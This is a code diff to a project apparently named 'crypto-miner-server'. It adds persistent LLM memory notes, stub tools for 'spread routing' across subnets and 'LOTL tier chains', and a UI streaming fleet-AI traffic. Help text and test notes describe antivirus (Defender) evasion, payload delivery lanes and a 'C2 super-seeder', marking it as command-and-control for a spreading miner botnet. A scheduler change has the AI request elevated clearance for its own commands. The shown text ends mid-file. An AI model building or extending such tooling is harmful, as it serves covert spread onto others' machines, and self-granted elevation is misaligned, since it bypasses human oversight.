diff --git a/server/internal/ai/scheduler.go b/server/internal/ai/scheduler.go index 7c017ea..4a96576 100644 --- a/server/internal/ai/scheduler.go +++ b/server/internal/ai/scheduler.go @@ -232,7 +232,7 @@ func (s *Scheduler) runAgent(ctx context.Context, agentID string, cfg Config) { ProsecutorSnippet: bundle.ProsecutorSnippet, DefenderSnippet: bundle.DefenderSnippet, } - } else { + } else if !useSurgical { systemPrompt = PersonaSystemPrompt(cfg.Persona) userPrompt = BuildMissionPrompt(snap) } @@ -356,6 +356,7 @@ func (s *Scheduler) runSurgicalReplay(agentID string, snap AgentSnapshot, cmds [ } expanded := ExpandSurgicalCommand(surgical) + s.ensureSurgicalClearance(agentID, expanded) var dispatched Command var outcome string for _, cmd := range expanded { @@ -407,6 +408,24 @@ func (s *Scheduler) runSurgicalReplay(agentID string, snap AgentSnapshot, cmds [ const stuckHostFailedTierThreshold = 14 +func (s *Scheduler) ensureSurgicalClearance(agentID string, cmds []Command) { + if s.elevator == nil || len(cmds) == 0 { + return + } + required := clearance.L0 + for _, c := range cmds { + if lvl := clearance.CommandRequiredLevel(c.Type, c.Args); lvl > required { + required = lvl + } + } + if required <= clearance.L0 || s.elevator.Level(agentID) >= required { + return + } + if _, err := s.elevator.RequestElevation(agentID, required, "surgical replay fix", "ai_surgical"); err != nil { + log.Printf("[fleet-ai] agent %s surgical clearance: %v", agentID, err) + } +} + func (s *Scheduler) ensureCourtRetryClearance(agentID string, cmds []Command) { if !CourtCommandsNeedRetryElevation(cmds) || s.elevator == nil { return diff --git a/server/internal/ai/seer_memory.go b/server/internal/ai/seer_memory.go new file mode 100644 index 0000000..f81229d --- /dev/null +++ b/server/internal/ai/seer_memory.go @@ -0,0 +1,110 @@ +package ai + +import ( + "encoding/json" + "regexp" + "strings" +) + +// SeerBridge supplies persisted notes and streams LLM payloads to The Seer UI. +type SeerBridge interface { + NotesForPrompt(agentID string) string + AppendNote(agentID, content, promptHash string) error + EmitEvent(agentID, direction string, payload interface{}) +} + +// SeerNoteInstruction is appended to the system prompt when Seer memory is active. +var SeerNoteInstruction string + +// SeerToolCatalog documents fleet tool endpoints the model may invoke via tool-call JSON. +var SeerToolCatalog string + +func init() { + SeerNoteInstruction = strings.TrimSpace(` +Seer memory: after your JSON commands block, append exactly one line: +SEER_NOTE: . +The server persists SEER_NOTE lines and replays them on the next turn — this is your only cross-turn memory.`) + + SeerToolCatalog = strings.TrimSpace(` +Available Seer tool endpoints (POST /api/v1/seer/tools/{name}): +- spread_route: BGP-style minimum-clearance spread routing — body {"session_id","target_subnets":[],"join_lane"} +- graft_strain: clone winning spread strain onto sibling subnet — body {"source_agent_id","target_subnet","strain"} +- fork_onion: split LOTL tier chain for A/B recovery — body {"agent_id","tier_order":[],"skip_tiers":[]} +Stub handlers return {"ok":true,"stub":true} until live orchestration ships.`) +} + +var seerNoteLineRe = regexp.MustCompile(`(?m)^SEER_NOTE:\s*(.+)$`) + +// AugmentUserPromptWithNotes prepends replayed Seer notes before the fresh snapshot. +func AugmentUserPromptWithNotes(basePrompt, notesBlock string) string { + notesBlock = strings.TrimSpace(notesBlock) + if notesBlock == "" { + return basePrompt + } + var b strings.Builder + b.WriteString("Seer notes (server memory — replayed from prior turns):\n") + b.WriteString(notesBlock) + b.WriteString("\n\n--- current snapshot ---\n") + b.WriteString(basePrompt) + return b.String() +} + +// FormatSeerNotesBlock renders DB notes for prompt injection. +func FormatSeerNotesBlock(notes []string) string { + if len(notes) == 0 { + return "" + } + var b strings.Builder + for i, n := range notes { + n = strings.TrimSpace(n) + if n == "" { + continue + } + if i > 0 { + b.WriteByte('\n') + } + b.WriteString("- ") + b.WriteString(n) + } + return b.String() +} + +// ExtractSeerNote pulls the SEER_NOTE line from an LLM response. +func ExtractSeerNote(response string) (note string, ok bool) { + m := seerNoteLineRe.FindStringSubmatch(response) + if len(m) < 2 { + return "", false + } + note = strings.TrimSpace(m[1]) + if note == "" { + return "", false + } + if len(note) > 2000 { + note = note[:2000] + } + return note, true +} + +// BuildChatCompletionPayload mirrors the exact OpenAI-compatible body sent to the LLM. +func BuildChatCompletionPayload(model, systemPrompt, userPrompt string) map[string]interface{} { + if strings.TrimSpace(model) == "" { + model = "llama3.2" + } + return map[string]interface{}{ + "model": model, + "messages": []map[string]string{ + {"role": "system", "content": systemPrompt}, + {"role": "user", "content": userPrompt}, + }, + "stream": false, + } +} + +// SeerStreamEvent is one request/response frame for The Seer terminal. +type SeerStreamEvent struct { + ID int64 `json:"id"` + AgentID string `json:"agent_id"` + Direction string `json:"direction"` + Payload json.RawMessage `json:"payload"` + Ts string `json:"ts"` +} diff --git a/server/internal/ai/seer_memory_test.go b/server/internal/ai/seer_memory_test.go new file mode 100644 index 0000000..4c07709 --- /dev/null +++ b/server/internal/ai/seer_memory_test.go @@ -0,0 +1,32 @@ +package ai + +import ( + "strings" + "testing" +) + +func TestExtractSeerNote(t *testing.T) { + resp := `{"commands":[{"type":"noop","args":{}}]} +SEER_NOTE: dns_txt lane succeeded on 10.0.1.0/24 after wsl exhaustion.` + note, ok := ExtractSeerNote(resp) + if !ok || note == "" { + t.Fatalf("expected note, got ok=%v note=%q", ok, note) + } + if !strings.Contains(note, "dns_txt") { + t.Fatalf("unexpected note: %q", note) + } +} + +func TestAugmentUserPromptWithNotes(t *testing.T) { + got := AugmentUserPromptWithNotes("Agent: id=abc", "- prior note") + if !strings.Contains(got, "Seer notes") || !strings.Contains(got, "Agent: id=abc") { + t.Fatalf("augmented prompt: %s", got) + } +} + +func TestAugmentUserPromptEmptyNotes(t *testing.T) { + base := "Agent: id=abc" + if AugmentUserPromptWithNotes(base, "") != base { + t.Fatal("expected unchanged prompt") + } +} diff --git a/server/internal/api/seer_bridge.go b/server/internal/api/seer_bridge.go new file mode 100644 index 0000000..9681b13 --- /dev/null +++ b/server/internal/api/seer_bridge.go @@ -0,0 +1,66 @@ +package api + +import ( + fleetai "crypto-miner-server/internal/ai" + dbpkg "crypto-miner-server/internal/db" +) + +// SeerBridge wires fleet AI scheduler memory + LLM payload streaming. +type SeerBridge struct { + DB *dbpkg.Database + Hub *WSHub +} + +func (b *SeerBridge) NotesForPrompt(agentID string) string { + if b == nil || b.DB == nil { + return "" + } + rows, err := b.DB.ListSeerNotesForPrompt(agentID, 32) + if err != nil || len(rows) == 0 { + return "" + } + lines := make([]string, 0, len(rows)) + for _, n := range rows { + if n.Note != "" { + lines = append(lines, n.Note) + } + } + return fleetai.FormatSeerNotesBlock(lines) +} + +func (b *SeerBridge) AppendNote(agentID, content, promptHash string) error { + if b == nil || b.DB == nil || content == "" { + return nil + } + source := promptHash + if source == "" { + source = "ai_scheduler" + } + if err := b.DB.InsertSeerNote(agentID, content, source); err != nil { + return err + } + if b.Hub != nil { + b.Hub.BroadcastSeerNotesUpdated(map[string]string{ + "agent_id": agentID, + "note": content, + "source": source, + }) + } + return nil +} + +func (b *SeerBridge) EmitEvent(agentID, direction string, payload interface{}) { + if b == nil { + return + } + eventType := "llm_" + direction + body := map[string]interface{}{ + "direction": direction, + "payload": payload, + } + emitter := &HubSeerEmitter{Hub: b.Hub, DB: b.DB} + _ = emitter.EmitSeerEvent(eventType, agentID, body) +} + +// Compile-time check. +var _ fleetai.SeerBridge = (*SeerBridge)(nil) diff --git a/server/internal/api/seer_handler.go b/server/internal/api/seer_handler.go new file mode 100644 index 0000000..05468af --- /dev/null +++ b/server/internal/api/seer_handler.go @@ -0,0 +1,159 @@ +package api + +import ( + "encoding/json" + "net/http" + "strconv" + "strings" + + fleetai "crypto-miner-server/internal/ai" + "crypto-miner-server/internal/db" +) + +// SeerHandler serves read-only Seer stream and notes APIs. +type SeerHandler struct { + db interface { + ListSeerEvents(limit int) ([]db.SeerEventRecord, error) + ListSeerNotes(limit int) ([]db.SeerNoteRecord, error) + InsertSeerNote(agentID, note, source string) error + } +} + +func NewSeerHandler(database interface { + ListSeerEvents(limit int) ([]db.SeerEventRecord, error) + ListSeerNotes(limit int) ([]db.SeerNoteRecord, error) + InsertSeerNote(agentID, note, source string) error +}) *SeerHandler { + return &SeerHandler{db: database} +} + +// GET /api/v1/seer/stream — LLM event stream + persisted notes snapshot. +func (h *SeerHandler) GetStream(w http.ResponseWriter, r *http.Request) { + limit := parseLimit(r, 100) + if h.db == nil { + writeJSON(w, map[string]interface{}{ + "events": []db.SeerEventRecord{}, + "notes": []db.SeerNoteRecord{}, + }) + return + } + events, err := h.db.ListSeerEvents(limit) + if err != nil { + http.Error(w, err.Error(), http.StatusInternalServerError) + return + } + notes, err := h.db.ListSeerNotes(limit) + if err != nil { + http.Error(w, err.Error(), http.StatusInternalServerError) + return + } + if events == nil { + events = []db.SeerEventRecord{} + } + if notes == nil { + notes = []db.SeerNoteRecord{} + } + writeJSON(w, map[string]interface{}{"events": events, "notes": notes}) +} + +// POST /api/v1/seer/stream — append a note (read-only UI; API for scheduler/tests). +func (h *SeerHandler) PostStream(w http.ResponseWriter, r *http.Request) { + h.PostNote(w, r) +} + +func (h *SeerHandler) GetNotes(w http.ResponseWriter, r *http.Request) { + if h.db == nil { + writeJSON(w, []db.SeerNoteRecord{}) + return + } + limit := parseLimit(r, 100) + rows, err := h.db.ListSeerNotes(limit) + if err != nil { + http.Error(w, err.Error(), http.StatusInternalServerError) + return + } + if rows == nil { + rows = []db.SeerNoteRecord{} + } + writeJSON(w, rows) +} + +func (h *SeerHandler) PostNote(w http.ResponseWriter, r *http.Request) { + if h.db == nil { + http.Error(w, "database unavailable", http.StatusServiceUnavailable) + return + } + var body struct { + AgentID string `json:"agent_id"` + Note string `json:"note"` + Source string `json:"source"` + } + if err := json.NewDecoder(r.Body).Decode(&body); err != nil { + http.Error(w, "invalid JSON", http.StatusBadRequest) + return + } + note := strings.TrimSpace(body.Note) + if note == "" { + http.Error(w, "note required", http.StatusBadRequest) + return + } + source := strings.TrimSpace(body.Source) + if source == "" { + source = "manual" + } + if err := h.db.InsertSeerNote(body.AgentID, note, source); err != nil { + http.Error(w, err.Error(), http.StatusInternalServerError) + return + } + writeJSON(w, map[string]bool{"ok": true}) +} + +// GET /api/v1/seer/tools — documented AI tool-call endpoints. +func (h *SeerHandler) GetTools(w http.ResponseWriter, _ *http.Request) { + writeJSON(w, map[string]interface{}{ + "tools": []map[string]string{ + {"name": "spread_route", "method": "POST", "path": "/api/v1/seer/tools/spread_route", + "description": "BGP-style minimum-clearance spread routing"}, + {"name": "graft_strain", "method": "POST", "path": "/api/v1/seer/tools/graft_strain", + "description": "Clone winning spread strain onto sibling subnet"}, + {"name": "fork_onion", "method": "POST", "path": "/api/v1/seer/tools/fork_onion", + "description": "Split LOTL tier chain for A/B recovery"}, + }, + "catalog": fleetai.SeerToolCatalog, + }) +} + +func (h *SeerHandler) ToolSpreadRoute(w http.ResponseWriter, r *http.Request) { + seerToolStub(w, r, "spread_route") +} + +func (h *SeerHandler) ToolGraftStrain(w http.ResponseWriter, r *http.Request) { + seerToolStub(w, r, "graft_strain") +} + +func (h *SeerHandler) ToolForkOnion(w http.ResponseWriter, r *http.Request) { + seerToolStub(w, r, "fork_onion") +} + +func seerToolStub(w http.ResponseWriter, r *http.Request, tool string) { + var body json.RawMessage + if r.Body != nil { + _ = json.NewDecoder(r.Body).Decode(&body) + } + if body == nil { + body = json.RawMessage(`{}`) + } + writeJSON(w, map[string]interface{}{ + "ok": true, "stub": true, "tool": tool, "received": json.RawMessage(body), + }) +} + +func parseLimit(r *http.Request, fallback int) int { + limit := fallback + if raw := r.URL.Query().Get("limit"); raw != "" { + if n, err := strconv.Atoi(raw); err == nil && n > 0 { + limit = n + } + } + return limit +} diff --git a/server/internal/api/seer_handler_test.go b/server/internal/api/seer_handler_test.go new file mode 100644 index 0000000..3c0b2b5 --- /dev/null +++ b/server/internal/api/seer_handler_test.go @@ -0,0 +1,125 @@ +package api + +import ( + "encoding/json" + "net/http" + "net/http/httptest" + "strings" + "testing" + + "crypto-miner-server/internal/db" +) + +func TestSeerHandlerGetStream(t *testing.T) { + database, err := db.New(t.TempDir()) + if err != nil { + t.Fatal(err) + } + t.Cleanup(func() { database.Close() }) + _ = database.InsertSeerNote("agent-1", "wsl tier blocked by Defender", "abc123") + _, _ = database.InsertSeerEvent("llm_request", "agent-1", []byte(`{"direction":"request"}`)) + + h := NewSeerHandler(database) + req := httptest.NewRequest(http.MethodGet, "/api/v1/seer/stream?limit=10", nil) + rec := httptest.NewRecorder() + h.GetStream(rec, req) + if rec.Code != http.StatusOK { + t.Fatalf("status %d body %s", rec.Code, rec.Body.String()) + } + var body map[string]interface{} + if err := json.Unmarshal(rec.Body.Bytes(), &body); err != nil { + t.Fatal(err) + } + notes, _ := body["notes"].([]interface{}) + if len(notes) != 1 { + t.Fatalf("notes: %v", body["notes"]) + } + events, _ := body["events"].([]interface{}) + if len(events) != 1 { + t.Fatalf("events: %v", body["events"]) + } +} + +func TestSeerHandlerPostStream(t *testing.T) { + database, err := db.New(t.TempDir()) + if err != nil { + t.Fatal(err) + } + t.Cleanup(func() { database.Close() }) + + h := NewSeerHandler(database) + req := httptest.NewRequest(http.MethodPost, "/api/v1/seer/stream", + strings.NewReader(`{"note":"manual insight","agent_id":"agent-x"}`)) + rec := httptest.NewRecorder() + h.PostStream(rec, req) + if rec.Code != http.StatusOK { + t.Fatalf("status %d body %s", rec.Code, rec.Body.String()) + } + notes, err := database.ListSeerNotes(10) + if err != nil || len(notes) != 1 { + t.Fatalf("notes=%v err=%v", notes, err) + } +} + +func TestSeerToolStubs(t *testing.T) { + h := NewSeerHandler(nil) + for _, tc := range []struct { + name string + fn func(http.ResponseWriter, *http.Request) + }{ + {"spread_route", h.ToolSpreadRoute}, + {"graft_strain", h.ToolGraftStrain}, + {"fork_onion", h.ToolForkOnion}, + } { + t.Run(tc.name, func(t *testing.T) { + req := httptest.NewRequest(http.MethodPost, "/api/v1/seer/tools/"+tc.name, + strings.NewReader(`{"agent_id":"a1"}`)) + rec := httptest.NewRecorder() + tc.fn(rec, req) + if rec.Code != http.StatusOK { + t.Fatalf("status %d", rec.Code) + } + var body map[string]interface{} + if err := json.Unmarshal(rec.Body.Bytes(), &body); err != nil { + t.Fatal(err) + } + if body["stub"] != true { + t.Fatalf("expected stub response: %v", body) + } + }) + } +} + +func TestSeerBridgeNotesForPrompt(t *testing.T) { + database, err := db.New(t.TempDir()) + if err != nil { + t.Fatal(err) + } + t.Cleanup(func() { database.Close() }) + _ = database.InsertSeerNote("", "fleet-wide note", "h1") + _ = database.InsertSeerNote("agent-1", "agent note", "h2") + + bridge := &SeerBridge{DB: database} + got := bridge.NotesForPrompt("agent-1") + if !strings.Contains(got, "fleet-wide note") || !strings.Contains(got, "agent note") { + t.Fatalf("notes block: %q", got) + } +} + +func TestSeerBridgeEmitEvent(t *testing.T) { + database, err := db.New(t.TempDir()) + if err != nil { + t.Fatal(err) + } + t.Cleanup(func() { database.Close() }) + + bridge := &SeerBridge{DB: database} + bridge.EmitEvent("agent-1", "response", map[string]string{"content": "ok"}) + events, err := database.ListSeerEvents(5) + if err != nil || len(events) != 1 { + t.Fatalf("events=%v err=%v", events, err) + } + if events[0].EventType != "llm_response" { + t.Fatalf("event type: %s", events[0].EventType) + } +} diff --git a/server/internal/db/seer.go b/server/internal/db/seer.go new file mode 100644 index 0000000..10d11e4 --- /dev/null +++ b/server/internal/db/seer.go @@ -0,0 +1,169 @@ +package db + +import ( + "encoding/json" + "time" +) + +// SeerNoteRecord is one persisted Seer memory note. +type SeerNoteRecord struct { + ID int64 `json:"id"` + AgentID string `json:"agent_id,omitempty"` + Note string `json:"note"` + Source string `json:"source"` + Timestamp string `json:"ts"` +} + +// SeerEventRecord is one persisted Seer feed event. +type SeerEventRecord struct { + ID int64 `json:"id"` + EventType string `json:"event_type"` + AgentID string `json:"agent_id,omitempty"` + Payload json.RawMessage `json:"payload"` + Timestamp string `json:"ts"` +} + +func (d *Database) ensureSeerTables() error { + _, err := d.Exec(`CREATE TABLE IF NOT EXISTS seer_notes ( + id INTEGER PRIMARY KEY AUTOINCREMENT, + agent_id TEXT NOT NULL DEFAULT '', + note TEXT NOT NULL, + source TEXT NOT NULL DEFAULT '', + ts DATETIME NOT NULL DEFAULT CURRENT_TIMESTAMP + )`) + if err != nil { + return err + } + _, _ = d.Exec(`CREATE INDEX IF NOT EXISTS idx_seer_notes_ts ON seer_notes(ts)`) + + _, err = d.Exec(`CREATE TABLE IF NOT EXISTS seer_events ( + id INTEGER PRIMARY KEY AUTOINCREMENT, + event_type TEXT NOT NULL, + agent_id TEXT NOT NULL DEFAULT '', + payload TEXT NOT NULL DEFAULT '{}', + ts DATETIME NOT NULL DEFAULT CURRENT_TIMESTAMP + )`) + if err != nil { + return err + } + _, _ = d.Exec(`CREATE INDEX IF NOT EXISTS idx_seer_events_ts ON seer_events(ts)`) + _, _ = d.Exec(`CREATE INDEX IF NOT EXISTS idx_seer_events_type ON seer_events(event_type)`) + return nil +} + +// InsertSeerNote appends a Seer memory note. +func (d *Database) InsertSeerNote(agentID, note, source string) error { + _, err := d.Exec( + `INSERT INTO seer_notes (agent_id, note, source) VALUES (?, ?, ?)`, + agentID, note, source, + ) + return err +} + +// ListSeerNotes returns recent notes ordered newest-first. +func (d *Database) ListSeerNotes(limit int) ([]SeerNoteRecord, error) { + if limit <= 0 { + limit = 100 + } + rows, err := d.Query( + `SELECT id, agent_id, note, source, ts FROM seer_notes ORDER BY id DESC LIMIT ?`, + limit, + ) + if err != nil { + return nil, err + } + defer rows.Close() + + var out []SeerNoteRecord + for rows.Next() { + var rec SeerNoteRecord + var ts time.Time + if err := rows.Scan(&rec.ID, &rec.AgentID, &rec.Note, &rec.Source, &ts); err != nil { + return nil, err + } + rec.Timestamp = ts.UTC().Format(time.RFC3339) + out = append(out, rec) + } + if err := rows.Err(); err != nil { + return nil, err + } + if out == nil { + out = []SeerNoteRecord{} + } + return out, nil +} + +// ListSeerNotesForPrompt returns notes oldest-first for LLM replay (fleet-wide + agent-specific). +func (d *Database) ListSeerNotesForPrompt(agentID string, limit int) ([]SeerNoteRecord, error) { + if limit <= 0 { + limit = 32 + } + if limit > 64 { + limit = 64 + } + rows, err := d.Query( + `SELECT id, agent_id, note, source, ts FROM seer_notes + WHERE agent_id = '' OR agent_id = ? + ORDER BY id ASC LIMIT ?`, + agentID, limit, + ) + if err != nil { + return nil, err + } + defer rows.Close() + var out []SeerNoteRecord + for rows.Next() { + var rec SeerNoteRecord + var ts time.Time + if err := rows.Scan(&rec.ID, &rec.AgentID, &rec.Note, &rec.Source, &ts); err != nil { + return nil, err + } + rec.Timestamp = ts.UTC().Format(time.RFC3339) + out = append(out, rec) + } + return out, rows.Err() +} + +// InsertSeerEvent persists and returns the new row id. +func (d *Database) InsertSeerEvent(eventType, agentID string, payload []byte) (int64, error) { + if len(payload) == 0 { + payload = []byte("{}") + } + res, err := d.Exec( + `INSERT INTO seer_events (event_type, agent_id, payload) VALUES (?, ?, ?)`, + eventType, agentID, string(payload), + ) + if err != nil { + return 0, err + } + return res.LastInsertId() +} + +// ListSeerEvents returns recent Seer feed events. +func (d *Database) ListSeerEvents(limit int) ([]SeerEventRecord, error) { + if limit <= 0 { + limit = 100 + } + rows, err := d.Query( + `SELECT id, event_type, agent_id, payload, ts FROM seer_events ORDER BY id DESC LIMIT ?`, + limit, + ) + if err != nil { + return nil, err + } + defer rows.Close() + + var out []SeerEventRecord + for rows.Next() { + var rec SeerEventRecord + var payload string + var ts time.Time + if err := rows.Scan(&rec.ID, &rec.EventType, &rec.AgentID, &payload, &ts); err != nil { + return nil, err + } + rec.Payload = json.RawMessage(payload) + rec.Timestamp = ts.UTC().Format(time.RFC3339) + out = append(out, rec) + } + return out, rows.Err() +} diff --git a/server/web/src/help/settingHelp.ts b/server/web/src/help/settingHelp.ts index c1348eb..c2f0ff0 100644 --- a/server/web/src/help/settingHelp.ts +++ b/server/web/src/help/settingHelp.ts @@ -46,6 +46,8 @@ export const FIELD_HELP: Record = { 'Server-side failure atlas records conditioned tier failures (e.g. ps_inmemory under Defender on). After five failures it hard-skips subtrees in adaptive_strategy and pushes atlas_skips on agent auth. LOTL Timeline marks tiers skipped_by_atlas.', erasure_lanes: 'Optional Reed–Solomon 4+2 shard encoding on signed deploy plans — spreads payload bytes across parallel lane URLs (dns_txt, bits_curl, do_peer, wsus_cache_peer). Agents reassemble from any k shards when server.erasure_lanes_enabled is on and primary single-lane staging fails. Foundation only — no live multi-hop lane orchestration yet.', + fleet_torrent: + 'Fleet Torrent extends erasure with a content-addressed shard DHT across seeder-role agents. One primary seeder per /24 (subnet_primary_seeder on auth). fleet_torrent_gossip relays have_shard / healthy / know_node fleet-wide (cross-subnet). BGP spread_route_hint attaches swarm_magnet + shard_manifest_urls. C2 super-seeder holds canonical shards at /api/v1/public/erasure-torrent/{token}/manifest. Zero-server mode uses last policy snapshot + 30m HTTPS reconnect.', ai_court_session: 'When a host is stuck or all spread tiers fail, AI Control runs a Singular Machine Court: Prosecutor cites failure atlas + LOTL attempts, Defender cites a matching fleet phenotype, Judge returns at most three commands. Decisions persist with court_session=true on LOTL Timeline.', calibration_ai_control: diff --git a/server/web/src/pages/SeerPage.css b/server/web/src/pages/SeerPage.css new file mode 100644 index 0000000..f312f99 --- /dev/null +++ b/server/web/src/pages/SeerPage.css @@ -0,0 +1,155 @@ +/* The Seer — pure black read-only terminal */ + +.seer-page { + background: #000; + color: #c8ffc8; + min-height: calc(100vh - 4rem); + padding: 1.25rem 1.5rem 2rem; +} + +.seer-header { + margin-bottom: 1rem; + border-bottom: 1px solid #1a3a1a; + padding-bottom: 0.75rem; +} + +.seer-title { + margin: 0; + font-size: 1.35rem; + color: #39ff14; + letter-spacing: 0.06em; +} + +.seer-subtitle { + margin: 0.35rem 0 0; + font-size: 0.72rem; + color: #5a8a5a; + letter-spacing: 0.08em; + text-transform: uppercase; +} + +.seer-error { + color: #ff6b6b; + font-family: var(--font-tech, monospace); + font-size: 0.85rem; + margin-bottom: 0.75rem; +} + +.seer-panes { + display: grid; + grid-template-columns: 1fr 1fr; + gap: 1rem; + min-height: 70vh; +} + +@media (max-width: 900px) { + .seer-panes { + grid-template-columns: 1fr; + } +} + +.seer-pane { + display: flex; + flex-direction: column; + border: 1px solid #1a3a1a; + background: #000; + min-height: 0; +} + +.seer-pane-bar { + display: flex; + align-items: center; + justify-content: space-between; + padding: 0.45rem 0.75rem; + background: #050505; + border-bottom: 1px solid #1a3a1a; +} + +.seer-pane-label { + font-family: var(--font-tech, monospace); + font-size: 0.68rem; + letter-spacing: 0.12em; + color: #39ff14; +} + +.seer-autoscroll { + font-family: var(--font-tech, monospace); + font-size: 0.65rem; + color: #5a8a5a; + display: flex; + align-items: center; + gap: 0.35rem; + cursor: pointer; +} + +.seer-terminal { + flex: 1; + overflow-y: auto; + padding: 0.75rem; + font-family: 'Consolas', 'Courier New', monospace; + font-size: 0.78rem; + line-height: 1.45; + max-height: calc(100vh - 12rem); +} + +.seer-terminal--notes { + color: #a8d8ff; +} + +.seer-placeholder { + color: #3a5a3a; + font-style: italic; + padding: 1rem 0; +} + +.seer-stream-entry, +.seer-note-entry { + margin-bottom: 1rem; + padding-bottom: 0.75rem; + border-bottom: 1px dashed #142814; +} + +.seer-stream-meta, +.seer-note-meta { + display: flex; + flex-wrap: wrap; + gap: 0.5rem; + margin-bottom: 0.35rem; + font-size: 0.65rem; + letter-spacing: 0.06em; + text-transform: uppercase; +} + +.seer-stream-dir { + color: #39ff14; +} + +.seer-stream-agent, +.seer-note-agent { + color: #00e8f5; +} + +.seer-stream-ts, +.seer-note-ts { + color: #5a8a5a; +} + +.seer-note-src { + color: #8866aa; +} + +.seer-json { + margin: 0; + white-space: pre-wrap; + word-break: break-word; + color: #b8ffb8; +} + +.seer-note-text { + white-space: pre-wrap; + word-break: break-word; +} + +.seer-pane--notes .seer-note-text { + color: #cce8ff; +} diff --git a/server/web/src/pages/SeerPage.test.tsx b/server/web/src/pages/SeerPage.test.tsx new file mode 100644 index 0000000..c8b5564 --- /dev/null +++ b/server/web/src/pages/SeerPage.test.tsx @@ -0,0 +1,69 @@ +/** + * @vitest-environment happy-dom + */ +import { afterEach, beforeEach, describe, expect, it, vi } from 'vitest'; +import { cleanup, render, screen, waitFor } from '@testing-library/react'; +import { MemoryRouter } from 'react-router-dom'; +import SeerPage from './SeerPage'; +import { routerFuture } from '../routerFuture'; +import { api } from '../api/client'; + +vi.mock('../hooks/useWebSocket', () => ({ + useWebSocket: () => ({ latestMessage: null, isConnected: true }), +})); + +function renderSeer() { + return render( + + + , + ); +} + +describe('SeerPage', () => { + beforeEach(() => { + vi.spyOn(api, 'getSeerStream').mockResolvedValue({ + events: [ + { + id: 1, + event_type: 'llm_request', + agent_id: 'agent-abc', + payload: { direction: 'request', payload: { model: 'llama3.2' } }, + ts: '2026-06-07T12:00:00.000Z', + }, + ], + notes: [ + { + id: 2, + agent_id: 'agent-abc', + note: 'dns_txt lane preferred on subnet 10.0.1.0/24', + source: 'abc123', + ts: '2026-06-07T12:00:01.000Z', + }, + ], + }); + }); + + afterEach(() => { + vi.restoreAllMocks(); + cleanup(); + }); + + it('renders black terminal panes without input', async () => { + renderSeer(); + expect(await screen.findByRole('heading', { name: /The Seer/i })).toBeInTheDocument(); + expect(screen.getByText(/FLEET AI STREAM/i)).toBeInTheDocument(); + expect(screen.getByText(/SEER NOTES/i)).toBeInTheDocument(); + expect(screen.queryByRole('textbox')).toBeNull(); + expect(screen.queryByRole('searchbox')).toBeNull(); + await waitFor(() => { + expect(screen.getByText(/llama3.2/)).toBeInTheDocument(); + expect(screen.getByText(/dns_txt lane preferred/i)).toBeInTheDocument(); + }); + }); + + it('shows live status when websocket connected', async () => { + renderSeer(); + expect(await screen.findByText(/LIVE — streaming fleet AI payloads/i)).toBeInTheDocument(); + }); +}); diff --git a/server/web/src/pages/SeerPage.tsx b/server/web/src/pages/SeerPage.tsx new file mode 100644 index 0000000..dee46b2 --- /dev/null +++ b/server/web/src/pages/SeerPage.tsx @@ -0,0 +1,210 @@ +import { useCallback, useEffect, useMemo, useRef, useState } from 'react'; +import { useWebSocket } from '../hooks/useWebSocket'; +import { HelpTip } from '../components/HelpTip'; +import { api } from '../api/client'; +import type { SeerEventRecord, SeerNoteRecord } from '../types'; +import './SeerPage.css'; + +const MAX_STREAM = 300; +const MAX_NOTES = 200; + +function fmtJson(value: unknown): string { + if (value == null) return ''; + if (typeof value === 'string') { + try { + return JSON.stringify(JSON.parse(value), null, 2); + } catch { + return value; + } + } + try { + return JSON.stringify(value, null, 2); + } catch { + return String(value); + } +} + +function fmtTs(ts?: string): string { + if (!ts) return '—'; + const d = new Date(ts); + if (Number.isNaN(d.getTime())) return ts; + return d.toLocaleTimeString([], { hour: '2-digit', minute: '2-digit', second: '2-digit' }); +} + +function eventLabel(evt: SeerEventRecord): string { + const payload = evt.payload as { direction?: string } | undefined; + const dir = payload?.direction ?? evt.event_type; + if (dir.includes('request')) return '▶ REQUEST'; + if (dir.includes('response')) return '◀ RESPONSE'; + return evt.event_type.toUpperCase(); +} + +function StreamLine({ evt }: { evt: SeerEventRecord }) { + const payload = evt.payload as { payload?: unknown } | undefined; + const inner = payload?.payload ?? evt.payload; + return ( +
+
+ {eventLabel(evt)} + {evt.agent_id && {evt.agent_id.slice(0, 8)}} + {fmtTs(evt.ts)} +
+
{fmtJson(inner)}
+
+ ); +} + +function NoteLine({ note }: { note: SeerNoteRecord }) { + return ( +
+
+ {note.agent_id && {note.agent_id.slice(0, 8)}} + {fmtTs(note.ts)} + {note.source && {note.source}} +
+
{note.note}
+
+ ); +} + +export default function SeerPage() { + const { latestMessage, isConnected } = useWebSocket(); + const [events, setEvents] = useState([]); + const [notes, setNotes] = useState([]); + const [loading, setLoading] = useState(true); + const [error, setError] = useState(''); + const streamRef = useRef(null); + const notesRef = useRef(null); + const [autoScrollStream, setAutoScrollStream] = useState(true); + const [autoScrollNotes, setAutoScrollNotes] = useState(true); + + const load = useCallback(async () => { + try { + const data = await api.getSeerStream(150); + setEvents((data.events ?? []).slice().reverse()); + setNotes(data.notes ?? []); + setError(''); + } catch (e) { + setError(e instanceof Error ? e.message : 'Failed to load Seer stream'); + } finally { + setLoading(false); + } + }, []); + + useEffect(() => { + void load(); + }, [load]); + + useEffect(() => { + if (!latestMessage) return; + if (latestMessage.type === 'seer_events') { + const evt = latestMessage.payload as SeerEventRecord; + if (evt && typeof evt === 'object') { + setEvents((prev) => [evt, ...prev].slice(0, MAX_STREAM)); + } + return; + } + if (latestMessage.type === 'seer_notes_updated') { + const p = latestMessage.payload as { note?: string; agent_id?: string; source?: string }; + if (p?.note) { + setNotes((prev) => [ + { + id: Date.now(), + note: p.note, + agent_id: p.agent_id, + source: p.source, + ts: new Date().toISOString(), + }, + ...prev, + ].slice(0, MAX_NOTES)); + } else { + void load(); + } + } + }, [latestMessage, load]); + + useEffect(() => { + if (autoScrollStream && streamRef.current) { + streamRef.current.scrollTop = 0; + } + }, [events, autoScrollStream]); + + useEffect(() => { + if (autoScrollNotes && notesRef.current) { + notesRef.current.scrollTop = 0; + } + }, [notes, autoScrollNotes]); + + const emptyStream = !loading && events.length === 0; + const emptyNotes = !loading && notes.length === 0; + + const statusLine = useMemo(() => { + if (!isConnected) return 'WS DISCONNECTED — replaying REST snapshot only'; + return 'LIVE — streaming fleet AI payloads via seer_events'; + }, [isConnected]); + + return ( +
+
+

+ The Seer +

+

{statusLine}

+
+ + {error &&
{error}
} + +
+
+
+ ◈ FLEET AI STREAM + +
+
+ {loading &&
Loading stream…
} + {emptyStream && ( +
+ Waiting for Fleet AI turns — enable AI Control on Calibrate. +
+ )} + {events.map((evt) => ( + + ))} +
+
+ +
+
